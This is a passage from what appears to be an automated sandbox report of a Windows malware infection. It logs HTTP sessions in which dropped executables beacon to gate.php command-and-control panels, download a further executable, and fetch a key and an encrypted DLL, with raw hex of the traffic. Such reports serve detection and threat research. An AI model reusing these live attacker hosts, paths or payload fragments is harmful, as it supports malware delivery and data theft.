                                                                                                                                                                                                                                                                                        24192.168.2.1049999185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.325145960 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 34 34 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1014442001&unit=246122658369
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:00.649497986 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:00 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        25192.168.2.1050008185.81.68.14780504C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:00.661220074 CET284OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:00.782649040 CET10OUTData Raw: 72 57 42 2b 57 5a 5c 55 43 12
                                                                                                                                                                                                                                                                                        Data Ascii: rWB+WZ\UC
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.231893063 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:01 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 38 64 61 34 0d 0a 4e 3f 3c 6f 33 10 19 16 17 43 44 10 5b 6a 5b 55 57 57 5b 59 5d 17 46 12 58 17 6d 45 14 4c 5b 05 46 47 1e 1f 49 13 48 42 17 18 45 1b 54 53 13 18 54 0e 5c 48 15 19 19 1b 1c 57 5c 5c 51 0a 46 43 48 19 51 0a 59 01 58 03 1b 54 5b 5c 49 13 48 42 17 18 42 07 55 55 54 53 43 13 48 4c 5a 5a 43 50 5a 58 51 1b 5b 16 55 1a 40 1b 16 47 1c 15 55 00 50 55 46 5e 14 42 0d 0c 52 1c 51 0d 56 57 55 53 19 02 5e 0f 1d 17 15 19 14 1e 43 50 46 12 5b 53 07 44 18 08 59 1c 5d 0a 59 56 1a 52 0c 5c 4e 40 19 12 14 0b 57 53 56 5b 5e 0f 56 4c 43 50 55 5c 5b 51 44 47 4d 4a 5f 5f 18 5e 5a 09 57 48 5b 14 52 15 18 11 41 1b 03 0d 5a 55 5a 07 4f 59 5d 53 58 4f 52 0d 5a 1f 1b 15 16 16 44 47 55 0a 41 5c 03 43 53 4b 51 09 5b 01 59 52 55 41 0a 42 4a 01 5a 5f 14 4e 19 12 13 5a 52 0f 52 10 19 5a 4b 5e 1c 16 1c 15 16 4e 5e 5f 05 1a 43 15 5a 09 55 02 18 58 47 1f 0b 5e 1d 0d 43 57 44 11 5c 1e 5a 59 5a 4b 13 4e 17 17 5b 08 18 5a 55 59 1a 03 5d 5f 05 1d 14 49 16 44 1e 10 1b 54 58 50 11 58 10 1b 1b 5f 45 48 1b 1c 19 14 1d 05 5f 11 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: 8da4N?<o3CD[j[UWW[Y]FXmEL[FGIHBETST\HW\\QFCHQYXT[\IHBBUUTSCHLZZCPZXQ[U@GUPUF^BRQVWUS^CPF[SDY]YVR\N@WSV[^VLCPU\[QDGMJ__^ZWH[RAZUZOY]SXORZDGUA\CSKQ[YRUABJZ_NZRRZK^N^_CZUXG^CWD\ZYZKN[ZUY]_IDTXPX_EH_VVTNJX[OJDN[DDQYkl;B:?4<F[^RUEDF8=C?o?B;=A<hN9nBEFFBF]AD@V]X\HPYYL\UTWHCQWZBQ^TEDk?CDB@IQM^[@4<DBGAV9VXZE_@?<BABn43DBE9lCDBBPVj[\P[BP^AWAEQPEPj@__K[U6RY\TW@YDAn\h<FFCDBBPX]RXQWQVE9UQhZDmFBGD\HMkCRYSP^U@EVUC__U\XZDY[SMlO^DEXWW\TGl@[WSk\RXU?Z,@_K_rRArEA\G@TZZVTZX[GAECEPj@MUABkCVAM\DZi?[j9FBYBQ?8@\W\eTCh[LTjXU^UPB:WkXnSlVEQZZLElhFQCYYFVCmA^i]eTCh[LTjVXAC_kYYKVXZE^B[G[KYZjACCXUCQGQQDASXjDRGZXeP_WP
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.231939077 CET1236INData Raw: 41 4c 53 6b 43 0f 5e 5b 54 5b 5c 5a 14 56 5a 46 59 6e 12 07 4f 46 3a 52 07 40 03 69 15 14 43 15 1c 10 07 4d 46 0b 3e 1b 53 56 58 51 08 56 4c 56 45 49 17 5f 50 55 5b 40 0d 54 59 01 56 42 0c 59 08 1a 08 40 5a 57 5d 0a 54 0a 16 69 10 08 51 17 10 05
                                                                                                                                                                                                                                                                                        Data Ascii: ALSkC^[T[\ZVZFYnOF:R@iCMF>SVXQVLVEI_PU[@TYVBY@ZW]TiQEG_BTYXJElXPUhPSP:pPTDWNPBXB^_^FIXXXPUXACMA8@AWNeFVEE[eo9l@@ZQ[ihC_Pj@\HIiSEkTWL\PZFX_kT:FF^NT^mFSnBXEMY
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.231945038 CET448INData Raw: 03 06 3e 1b 10 58 43 43 0e 57 0d 54 40 4a 04 6a 16 6c 17 14 05 47 44 0d 54 59 17 44 03 57 12 08 6b 16 5e 05 57 38 40 15 5b 52 5f 65 12 5a 57 45 05 6e 0c 42 58 65 1b 16 57 5c 54 47 17 0f 6c 40 51 59 17 5b 4b 57 09 5b 43 46 5e 0f 11 0a 17 58 57 44
                                                                                                                                                                                                                                                                                        Data Ascii: >XCCWT@JjlGDTYDWk^W8@[R_eZWEnBXeW\TGl@QY[KW[CF^XWDZlEVYL\FUTW[FjGPF^Pe]TF_LUe]]UPUP[BhFWHhRBhDEBTnV^__POPGP]SZD\RQQ^YAV[]TE8@BCIWYARVFJj\TV^o^SR:XqV@TCUCMB_
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.232069016 CET1236INData Raw: 0d 44 07 1a 47 5c 58 55 40 59 43 51 59 6e 12 04 58 44 08 18 0f 50 32 50 5b 51 5c 02 45 0d 13 40 57 6a 40 07 0c 55 57 55 04 5d 42 51 5a 4b 04 6a 16 53 43 42 38 10 10 10 41 1b 11 53 1e 40 5b 69 15 57 5e 0d 57 0d 05 1b 53 46 12 17 59 5d 53 59 15 58
                                                                                                                                                                                                                                                                                        Data Ascii: DG\XU@YCQYnXDP2P[Q\E@Wj@UWU]BQZKjSCB8AS@[iW^WSFY]SYX^VXM_[^Z_S^SB:XAQZJCjPRYf__Q\QhFs4aJEU]S_IEMCAiMSLDiDBQCSX[hDn>8@DWLUj=BYTT\hVBnBZWZZA_mAT>ECUjP>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.232110023 CET1236INData Raw: 55 55 08 17 5d 1e 06 5e 43 07 05 54 46 0e 09 50 0d 44 10 01 5b 57 16 45 5b 68 44 54 42 40 59 4e 52 17 4f 56 5d 58 16 5c 5e 4d 16 17 12 46 0f 68 5c 57 49 43 40 1d 56 5b 0a 46 51 0b 59 53 17 6a 44 0a 46 09 5e 5a 41 16 45 44 0b 51 0f 6a 40 4c 43 5c
                                                                                                                                                                                                                                                                                        Data Ascii: UU]^CTFPD[WE[hDTB@YNROV]X\^MFh\WIC@V[FQYSjDF^ZAEDQj@LC\DhU>WX[QiJ@=SWS:FANDT^mFPJB>ZZVB_kJN[kY[DFESiFFD_XO\\FMlVETTIPBU\\Nl@YYS:FTB@^^PQB_eVPQ=BVGPXXQWQl@tYSFW\RZE?DYSUQ_UR
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.232115984 CET1236INData Raw: 10 46 03 4d 58 1b 0c 17 43 1b 40 1b 38 33 19 16 14 10 15 14 44 12 10 42 15 41 00 54 39 57 09 5b 43 51 5f 17 13 5e 6f 3f 12 16 42 19 10 19 16 17 41 11 39 3a 3f 19 19 16 14 10 15 14 44 12 10 42 17 16 1e 3b 6c 14 46 15 17 14 11 43 11 44 42 15 12 16
                                                                                                                                                                                                                                                                                        Data Ascii: FMXC@83DBAT9W[CQ_^o?BA9:?DB;lFCDBBRVP=UP_VDQF[T_kWGZSQ<TZ@{JCXQR=BVGPX\YQP\>BChD<iDBBABPW\QSA^^R@X\A_AXTUjPSjWL[VUGhFSVE:YDCGPU
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.232275009 CET1236INData Raw: 6d 38 00 05 4a 6d 03 14 56 78 1b 71 51 1c 5b 6a 4e 0d 09 4b 68 6c 57 1b 03 12 6d 59 17 55 0a 58 15 40 46 59 43 57 63 06 56 01 1a 50 41 16 5f 19 6b 19 19 6b 3d 53 4a 7b 49 74 45 5a 40 53 04 1d 3f 53 1d 18 76 1b 2d 7c 4b 7a 36 18 6d 04 1c 5a 6c 1f
                                                                                                                                                                                                                                                                                        Data Ascii: m8JmVxqQ[jNKhlWmYUX@FYCWcVPA_kk=SJ{ItEZ@S?Sv-|Kz6mZlP[DleT?ZVXGD@JbPSS[l?mJaNBKbQLvLy({ilikj;P^D[FLUKOd]TAVKwX\NLQYsWRX^DWZLZXPZS/^RF_YFuTW^SSEX^RK_
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.232280016 CET1236INData Raw: 17 14 11 43 11 44 42 15 12 16 42 19 12 5d 57 43 00 6e 00 52 53 56 4b 53 16 0a 15 16 58 1d 44 0b 43 5a 00 08 44 18 6b 3f 17 14 11 43 11 44 42 15 12 16 42 19 12 50 58 5d 04 52 16 15 0f 19 1b 0a 47 53 47 5d 14 46 0e 04 42 58 06 42 0f 5b 08 15 45 51
                                                                                                                                                                                                                                                                                        Data Ascii: CDBB]WCnRSVKSXDCZDk?CDBBPX]RGSG]FBXB[EQAPt^Z#]TKSDT[\NwPTGQAU[FCSR6RWNJlA>kWbmnUIY]OMwH~,(enN9QMjkejVVL98=UKOvy)*2hOmBM[JeeTWi_SYE@gRST
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.232285976 CET1236INData Raw: 3f 50 50 03 00 61 69 04 4b 00 36 06 5a 05 33 74 07 73 4f 45 07 02 54 10 19 19 4d 44 4c 0a 15 13 30 70 5d 01 65 4f 5d 74 51 06 11 40 62 60 7f 55 70 2f 27 64 00 7e 16 6a 5b 0d 0e 50 0f 04 10 5f 45 7b 1e 16 49 0b 15 47 01 46 79 0c 43 53 17 40 07 58
                                                                                                                                                                                                                                                                                        Data Ascii: ?PPaiK6Z3tsOETMDL0p]eO]tQ@b`Up/'d~j[P_E{IGFyCS@XN]E^W\qUZvURFJ\E^PC%VTRESJ_G[F4<ABH9nBkh<FIJ8=9;CJihBEKZ[@DAXRSSZYF=hEDDA_CN@?<B@S=TZWMSZDDi=hEFF
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.232290983 CET776INData Raw: 5f 1e 06 5a 07 47 15 7b 56 59 54 43 0c 5a 42 4e 12 5f 04 19 18 5a 5a 56 12 42 2c 56 58 5c 17 42 5b 7c 5a 43 01 40 73 03 44 53 4d 1f 48 5d 08 56 5b 41 55 06 42 4c 45 44 40 55 0d 5d 55 1e 1f 1e 41 4a 42 52 59 17 5a 5a 55 43 46 78 0d 41 44 4c 45 53
                                                                                                                                                                                                                                                                                        Data Ascii: _ZG{VYTCZBN_ZZVB,VX\B[|ZC@sDSMH]V[AUBLED@U]UAJBRYZZUCFxADLESYQNV[UBPBDDALBJKSZZFRA$RFFDQBCDPBgsqQOoVmq)vXGXyw3dW2oB\DQFU\STWSRPU_QUWSPXRSPQUBW(V^2gP5


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        26192.168.2.1050010185.215.113.16807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:00.805367947 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.145746946 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 2791936
                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:23:21 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "675affe9-2a9a00"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 72 39 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+r9+`Ui` @ @.rsrc`2@.idata 8@nwmnxdbs@*:*:@esrtnfgg *t*@.taggant@+"x*@
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.145785093 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.145792007 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.145849943 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.145920992 CET896INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.145926952 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.145934105 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.145945072 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: koRP{>t"J}$dZx~p[%UsXtZ.X,p+be}z|
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.146176100 CET1236INData Raw: 4b f4 bd 58 15 7e f6 89 dd de 70 a7 15 aa 04 f0 49 bc 84 a2 8a 54 2f 9d 43 ca 92 1b 3e ca 84 c1 14 15 07 98 66 33 62 7c 0e cd b0 b1 40 59 7a a1 46 a1 8f be 02 5b 60 c0 20 cc 33 a7 f9 ec 67 9c a2 58 71 c4 d3 ac 40 ac 22 c1 25 b5 67 2b db cc 60 94
                                                                                                                                                                                                                                                                                        Data Ascii: KX~pIT/C>f3b|@YzF[` 3gXq@"%g+`|afO{9z(By.`zly$<~PsV-$Pf?.Qy>8XsQj1'RR~<^Qs;N
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.146182060 CET1236INData Raw: 84 6e c6 ba ff 7b 78 d2 c9 4b aa fc ef 41 b3 01 f1 51 94 18 1c 89 2e cb 5d 67 75 ff fd 62 06 f8 e2 ce 50 da e3 b4 fd 11 c6 19 97 09 e7 eb b7 88 fc 52 90 57 9a 1b 7f 42 86 c2 bc b5 cc b2 b4 5a 4d 8a 94 4a f2 21 9b fc 3c bb 9e 97 9d 14 95 fa 10 33
                                                                                                                                                                                                                                                                                        Data Ascii: n{xKAQ.]gubPRWBZMJ!<3kILqYR=P9+O9@sXELr2kA06Q:Zj1epH7;-rn\R^Dup`BW0PyGL
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.265997887 CET1236INData Raw: 77 67 22 7f cc 99 44 eb fa f7 78 6f ca 20 f3 2c 8b b7 62 ad 22 7a 53 84 b4 bc e0 a4 5f 79 73 ef 2d 89 b8 66 4f 68 56 b0 f0 06 fb dc 47 54 64 72 22 88 6a 02 dc 57 78 ec 2e 9d 30 e5 cf 8b d0 b2 36 2e 2d 3d 1e de 6e e8 56 59 f7 b2 43 58 8b 74 1d 77
                                                                                                                                                                                                                                                                                        Data Ascii: wg"Dxo ,b"zS_ys-fOhVGTdr"jWx.06.-=nVYCXtwH/QNbQ}\_TkrFlvbP.Hsk$rCZ~HH}hS*Ss$cs_*r\2K_,N


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        27192.168.2.1050011185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:01.272135019 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:01.392290115 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:02.927227974 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:01 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        28192.168.2.1050017185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:03.150294065 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:03.271064043 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:04.864295959 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:03 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        29192.168.2.105002080.82.65.70805584C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:05.026329994 CET412OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: 1
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:06.384747982 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:06 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:06.446377039 CET386OUTGET /dll/key HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: 1
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:06.920089006 CET224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:06 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 21
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                                                                                                                                                                                                                                        Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.014075041 CET391OUTGET /dll/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: 1
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.587246895 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:07 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                                                                                                                                                                                                                                                        Content-Length: 97296
